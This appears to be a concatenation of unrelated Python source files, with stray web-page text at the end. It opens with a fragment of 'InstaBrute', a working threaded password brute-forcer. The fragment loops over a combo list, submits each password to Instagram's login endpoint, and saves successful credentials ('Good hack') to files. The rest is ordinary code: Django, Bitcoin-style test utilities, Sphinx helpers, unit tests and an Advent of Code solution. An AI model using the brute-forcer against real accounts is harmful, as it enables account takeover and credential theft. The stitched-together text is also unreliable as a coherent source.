with open (Combo, 'r') as x:
Combolist = x.read ().splitlines ()
thread = []
self.Coutprox = 0
for combo in Combolist:
password = combo.split (':')[0]
t = threading.Thread (target=self.New_Br, args=(user, password))
t.start ()
thread.append (t)
time.sleep (0.9)
for j in thread:
j.join ()
def cls(self):
linux = 'clear'
windows = 'cls'
os.system ([linux, windows][os.name == 'nt'])
def New_Br(self, user, pwd):
link = 'https://www.instagram.com/accounts/login/'
login_url = 'https://www.instagram.com/accounts/login/ajax/'
time = int (datetime.now ().timestamp ())
payload = {
'username': user,
'enc_password': f'#PWD_INSTAGRAM_BROWSER:0:{time}:{pwd}',
'queryParams': {},
'optIntoOneTap': 'false'
}
with requests.Session () as s:
r = s.get (link)
r = s.post (login_url, data=payload, headers={
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://www.instagram.com/accounts/login/",
"x-csrftoken": 'ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo'
})
print (f'{user}:{pwd}\n----------------------------')
if 'checkpoint_url' in r.text:
print (('' + user + ':' + pwd + ' --> Good hack '))
with open ('good.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
elif 'two_factor_required' in r.text:
print (('' + user + ':' + pwd + ' --> Good It has to be checked '))
with open ('results_NeedVerfiy.txt', 'a') as x:
x.write (user + ':' + pwd + '\n')
InstaBrute()
|
#!/usr/bin/env python
#from gevent import monkey
#monkey.patch_all(aggressive=True)
#from psycogreen.gevent import patch_psycopg
#patch_psycopg()
#import eventlet
#eventlet.monkey_patch()
#from psycogreen.eventlet import patch_psycopg
#patch_psycopg()
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "internetnl.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
|
class AutoVivification(dict):
"""Implementation of perl's autovivification."""
def __missing__(self, key):
value = self[key] = type(self)()
return value
weather = AutoVivification()
weather['china']['guangdong']['shenzhen'] = 'sunny'
weather['china']['hubei']['wuhan'] = 'sunny'
weather['USA']['California']['Los Angeles'] = 'sunny'
print(weather)
|
#!/usr/bin/env python3
# Copyright (c) 2014-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Helpful routines for regression testing."""
from base64 import b64encode
from binascii import hexlify, unhexlify
from decimal import Decimal, ROUND_DOWN
import hashlib
import inspect
import json
import logging
import os
import random
import re
from subprocess import CalledProcessError
import time
from . import coverage
from .authproxy import AuthServiceProxy, JSONRPCException
logger = logging.getLogger("TestFramework.utils")
# Assert functions
##################
def assert_fee_amount(fee, tx_size, fee_per_kB):
"""Assert the fee was in range"""
target_fee = round(tx_size * fee_per_kB / 1000, 8)
if fee < target_fee:
raise AssertionError("Fee of %s CPT too low! (Should be %s CPT)" % (str(fee), str(target_fee)))
# allow the wallet's estimation to be at most 2 bytes off
if fee > (tx_size + 2) * fee_per_kB / 1000:
raise AssertionError("Fee of %s CPT too high! (Should be %s CPT)" % (str(fee), str(target_fee)))
def assert_equal(thing1, thing2, *args):
if thing1 != thing2 or any(thing1 != arg for arg in args):
raise AssertionError("not(%s)" % " == ".join(str(arg) for arg in (thing1, thing2) + args))
def assert_greater_than(thing1, thing2):
if thing1 <= thing2:
raise AssertionError("%s <= %s" % (str(thing1), str(thing2)))
def assert_greater_than_or_equal(thing1, thing2):
if thing1 < thing2:
raise AssertionError("%s < %s" % (str(thing1), str(thing2)))
def assert_raises(exc, fun, *args, **kwds):
assert_raises_message(exc, None, fun, *args, **kwds)
def assert_raises_message(exc, message, fun, *args, **kwds):
try:
fun(*args, **kwds)
except JSONRPCException:
raise AssertionError("Use assert_raises_rpc_error() to test RPC failures")
except exc as e:
if message is not None and message not in e.error['message']:
raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def bytes_to_hex_str(byte_str):
return hexlify(byte_str).decode('ascii')
def hash256(byte_str):
sha256 = hashlib.sha256()
sha256.update(byte_str)
sha256d = hashlib.sha256()
sha256d.update(sha256.digest())
return sha256d.digest()[::-1]
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 8
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert(n <= MAX_NODES)
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_url(datadir, i, rpchost=None):
rpc_u, rpc_p = get_auth_cookie(datadir)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "generalcoin.conf"), 'w', encoding='utf8') as f:
f.write("regtest=1\n")
f.write("[regtest]\n")
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "generalcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "generalcoin.conf")):
with open(os.path.join(datadir, "generalcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")) and os.access(os.path.join(datadir, "regtest", ".cookie"), os.R_OK):
with open(os.path.join(datadir, "regtest", ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir):
if os.path.isfile(os.path.join(datadir, "regtest", ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, "regtest", ".cookie"))
def get_bip9_status(node, key):
info = node.getblockchaininfo()
return info['bip9_softforks'][key]
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert(confirmations_required >= 0)
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
# and 14 of them is close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
|
import unittest
from steem.utils import (
constructIdentifier,
sanitizePermlink,
derivePermlink,
resolveIdentifier,
yaml_parse_file,
formatTime,
)
class Testcases(unittest.TestCase) :
def test_constructIdentifier(self):
self.assertEqual(constructIdentifier("A", "B"), "@A/B")
def test_sanitizePermlink(self):
self.assertEqual(sanitizePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(sanitizePermlink("[](){}"), "")
def test_derivePermlink(self):
self.assertEqual(derivePermlink("Hello World"), "hello-world")
self.assertEqual(derivePermlink("aAf_0.12"), "aaf-0-12")
self.assertEqual(derivePermlink("[](){}"), "")
def test_resolveIdentifier(self):
self.assertEqual(resolveIdentifier("@A/B"), ("A", "B"))
def test_yaml_parse_file(self):
pass
def test_formatTime(self):
self.assertEqual(formatTime(1463480746), "20160517t102546")
if __name__ == '__main__':
unittest.main()
|
"""File utility functions for Sphinx."""
import os
import posixpath
from typing import TYPE_CHECKING, Callable, Dict
from docutils.utils import relative_path
from sphinx.util.osutil import copyfile, ensuredir
from sphinx.util.typing import PathMatcher
if TYPE_CHECKING:
from sphinx.util.template import BaseRenderer
def copy_asset_file(source: str, destination: str,
context: Dict = None, renderer: "BaseRenderer" = None) -> None:
"""Copy an asset file to destination.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file
:param destination: The path to destination file or directory
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
"""
if not os.path.exists(source):
return
if os.path.isdir(destination):
# Use source filename if destination points a directory
destination = os.path.join(destination, os.path.basename(source))
if source.lower().endswith('_t') and context is not None:
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
with open(source, encoding='utf-8') as fsrc:
if destination.lower().endswith('_t'):
destination = destination[:-2]
with open(destination, 'w', encoding='utf-8') as fdst:
fdst.write(renderer.render_string(fsrc.read(), context))
else:
copyfile(source, destination)
def copy_asset(source: str, destination: str, excluded: PathMatcher = lambda path: False,
context: Dict = None, renderer: "BaseRenderer" = None,
onerror: Callable[[str, Exception], None] = None) -> None:
"""Copy asset files to destination recursively.
On copying, it expands the template variables if context argument is given and
the asset is a template file.
:param source: The path to source file or directory
:param destination: The path to destination directory
:param excluded: The matcher to determine the given path should be copied or not
:param context: The template variables. If not given, template files are simply copied
:param renderer: The template engine. If not given, SphinxRenderer is used by default
:param onerror: The error handler.
"""
if not os.path.exists(source):
return
if renderer is None:
from sphinx.util.template import SphinxRenderer
renderer = SphinxRenderer()
ensuredir(destination)
if os.path.isfile(source):
copy_asset_file(source, destination, context, renderer)
return
for root, dirs, files in os.walk(source, followlinks=True):
reldir = relative_path(source, root)
for dir in dirs[:]:
if excluded(posixpath.join(reldir, dir)):
dirs.remove(dir)
else:
ensuredir(posixpath.join(destination, reldir, dir))
for filename in files:
if not excluded(posixpath.join(reldir, filename)):
try:
copy_asset_file(posixpath.join(root, filename),
posixpath.join(destination, reldir),
context, renderer)
except Exception as exc:
if onerror:
onerror(posixpath.join(root, filename), exc)
else:
raise
|
# -*- coding: utf-8 -*-
# Copyright (c) 2018, Marc Anthony Reyes and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestGame(unittest.TestCase):
pass
|
#!/bin/env python3
def puzzle2():
entries = set()
allowed1 = {"byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"}
valid = 0
# Read in all the rules
with open('input.txt', 'r') as input:
l = 0
for line in input:
l += 1
if line == "\n":
# print(entries)
if len(allowed1 & entries) == 7:
valid += 1
entries = set()
else:
keyval = line.split(' ')
for i in keyval:
(key, val) = i.split(':')
if val[-1:] == '\n':
val = val[:-1]
if key == "byr":
val = int(val)
if val >= 1920 and val <= 2002:
entries.add(key)
else:
print('{} byr'.format(l))
if key == "iyr":
val = int(val)
if val >= 2010 and val <= 2020:
entries.add(key)
else:
print('{} iyr'.format(l))
if key == "eyr":
val = int(val)
if val >= 2020 and val <= 2030:
entries.add(key)
else:
print('{} eyr'.format(l))
if key == "hgt":
if val[-2:] == "cm":
val = int(val[:-2])
if val >= 150 and val <= 193:
entries.add(key)
else:
print('{} hgt'.format(l))
elif val[-2:] == "in":
val = int(val[:-2])
if val >= 59 and val <= 76:
entries.add(key)
else:
print('{} hgt'.format(l))
if key == "hcl":
if val[0] == '#':
val = val[1:]
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', 'a', 'b', 'c', 'd', 'e', 'f']:
check += 1
if check == 6:
entries.add(key)
else:
print('{} hcl'.format(l))
if key == "ecl":
if val in ['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']:
entries.add(key)
else:
print('{} ecl'.format(l))
if key == "pid":
check = 0
for c in val:
if c in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0']:
check += 1
if check == 9:
entries.add(key)
else:
print('{} pid'.format(l))
if len(allowed1 & entries) == 7:
valid += 1
print(valid)
if __name__ == "__main__":
puzzle2()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.